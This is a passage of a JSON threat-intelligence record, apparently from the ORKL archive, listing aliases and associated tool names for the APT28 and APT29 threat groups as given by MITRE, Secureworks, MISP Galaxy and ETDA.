				"STRONTIUM",
				"Grizzly Steppe",
				"G0007"
			],
			"source_name": "MISPGALAXY:APT28",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e3767160-695d-4360-8b2e-d5274db3f7cd",
			"created_at": "2022-10-25T16:47:55.914348Z",
			"updated_at": "2026-04-10T02:00:03.610018Z",
			"deleted_at": null,
			"main_name": "IRON TWILIGHT",
			"aliases": [
				"APT28 ",
				"ATK5 ",
				"Blue Athena ",
				"BlueDelta ",
				"FROZENLAKE ",
				"Fancy Bear ",
				"Fighting Ursa ",
				"Forest Blizzard ",
				"GRAPHITE ",
				"Group 74 ",
				"PawnStorm ",
				"STRONTIUM ",
				"Sednit ",
				"Snakemackerel ",
				"Sofacy ",
				"TA422 ",
				"TG-4127 ",
				"Tsar Team ",
				"UAC-0001 "
			],
			"source_name": "Secureworks:IRON TWILIGHT",
			"tools": [
				"Downdelph",
				"EVILTOSS",
				"SEDUPLOADER",
				"SHARPFRONT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "ae320ed7-9a63-42ed-944b-44ada7313495",
			"created_at": "2022-10-25T15:50:23.671663Z",
			"updated_at": "2026-04-10T02:00:05.283292Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"APT28",
				"IRON TWILIGHT",
				"SNAKEMACKEREL",
				"Group 74",
				"Sednit",
				"Sofacy",
				"Pawn Storm",
				"Fancy Bear",
				"STRONTIUM",
				"Tsar Team",
				"Threat Group-4127",
				"TG-4127",
				"Forest Blizzard",
				"FROZENLAKE",
				"GruesomeLarch"
			],
			"source_name": "MITRE:APT28",
			"tools": [
				"Wevtutil",
				"certutil",
				"Forfiles",
				"DealersChoice",
				"Mimikatz",
				"ADVSTORESHELL",
				"Komplex",
				"HIDEDRV",
				"JHUHUGIT",
				"Koadic",
				"Winexe",
				"cipher.exe",
				"XTunnel",
				"Drovorub",
				"CORESHELL",
				"OLDBAIT",
				"Downdelph",
				"XAgentOSX",
				"USBStealer",
				"Zebrocy",
				"reGeorg",
				"Fysbis",
				"LoJax"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "20d3a08a-3b97-4b2f-90b8-92a89089a57a",
			"created_at": "2022-10-25T15:50:23.548494Z",
			"updated_at": "2026-04-10T02:00:05.292748Z",
			"deleted_at": null,
			"main_name": "APT29",
			"aliases": [
				"APT29",
				"IRON RITUAL",
				"IRON HEMLOCK",
				"NobleBaron",
				"Dark Halo",
				"NOBELIUM",
				"UNC2452",
				"YTTRIUM",
				"The Dukes",
				"Cozy Bear",
				"CozyDuke",
				"SolarStorm",
				"Blue Kitsune",
				"UNC3524",
				"Midnight Blizzard"
			],
			"source_name": "MITRE:APT29",
			"tools": [
				"PinchDuke",
				"ROADTools",
				"WellMail",
				"CozyCar",
				"Mimikatz",
				"Tasklist",
				"OnionDuke",
				"FatDuke",
				"POSHSPY",
				"EnvyScout",
				"SoreFang",
				"GeminiDuke",
				"reGeorg",
				"GoldMax",
				"FoggyWeb",
				"SDelete",
				"PolyglotDuke",
				"AADInternals",
				"MiniDuke",
				"SeaDuke",
				"Sibot",
				"RegDuke",
				"CloudDuke",
				"GoldFinder",
				"AdFind",
				"PsExec",
				"NativeZone",
				"Systeminfo",
				"ipconfig",
				"Impacket",
				"Cobalt Strike",
				"PowerDuke",
				"QUIETEXIT",
				"HAMMERTOSS",
				"BoomBox",
				"CosmicDuke",
				"WellMess",
				"VaporRage",
				"LiteDuke"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "f27790ff-4ee0-40a5-9c84-2b523a9d3270",
			"created_at": "2022-10-25T16:07:23.341684Z",
			"updated_at": "2026-04-10T02:00:04.549917Z",
			"deleted_at": null,
			"main_name": "APT 29",
			"aliases": [
				"APT 29",
				"ATK 7",
				"Blue Dev 5",
				"BlueBravo",
				"Cloaked Ursa",
				"CloudLook",
				"Cozy Bear",
				"Dark Halo",
				"Earth Koshchei",
				"G0016",
				"Grizzly Steppe",
				"Group 100",
				"ITG11",
				"Iron Hemlock",
				"Iron Ritual",
				"Midnight Blizzard",
				"Minidionis",
				"Nobelium",
				"NobleBaron",
				"Operation Ghost",
				"Operation Office monkeys",
				"Operation StellarParticle",
				"SilverFish",
				"Solar Phoenix",
				"SolarStorm",
				"StellarParticle",
				"TEMP.Monkeys",
				"The Dukes",
				"UNC2452",
				"UNC3524",
				"Yttrium"
			],
			"source_name": "ETDA:APT 29",
			"tools": [
				"7-Zip",
				"ATI-Agent",
				"AdFind",
				"Agentemis",
				"AtNow",
				"BEATDROP",
				"BotgenStudios",
				"CEELOADER",
				"Cloud Duke",
				"CloudDuke",
				"CloudLook",
				"Cobalt Strike",
				"CobaltStrike",
				"CosmicDuke",
				"Cozer",
				"CozyBear",
				"CozyCar",
				"CozyDuke",
				"Danfuan",
				"EnvyScout",
				"EuroAPT",
				"FatDuke",
				"FoggyWeb",
				"GeminiDuke",
				"Geppei",
				"GoldFinder",
				"GoldMax",
				"GraphDrop",
				"GraphicalNeutrino",
				"GraphicalProton",
				"HAMMERTOSS",
				"HammerDuke",
				"LOLBAS",
				"LOLBins",
				"LiteDuke",
				"Living off the Land",
				"MagicWeb",
				"Mimikatz",
				"MiniDionis",
				"MiniDuke",
				"NemesisGemina",
				"NetDuke",
				"OnionDuke",
				"POSHSPY",
				"PinchDuke",
				"PolyglotDuke",
				"PowerDuke",
				"QUIETEXIT",
				"ROOTSAW",
				"RegDuke",
				"Rubeus",
				"SNOWYAMBER",
				"SPICYBEAT",
				"SUNSHUTTLE",
				"SeaDaddy",
				"SeaDask",
				"SeaDesk",
				"SeaDuke",
				"Sharp-SMBExec",
				"SharpView",
				"Sibot",
				"Solorigate",
				"SoreFang",
				"TinyBaron",
				"WINELOADER",
				"WellMail",
				"WellMess",
				"cobeacon",
				"elf.wellmess",
				"reGeorg",
				"tDiscoverer"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434246,
	"ts_updated_at": 1775792253,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/03b44872d273ab9d1dc4e6dd8817b248c175f65c.pdf",
		"text": "https://archive.orkl.eu/03b44872d273ab9d1dc4e6dd8817b248c175f65c.txt",
		"img": "https://archive.orkl.eu/03b44872d273ab9d1dc4e6dd8817b248c175f65c.jpg"
	}
}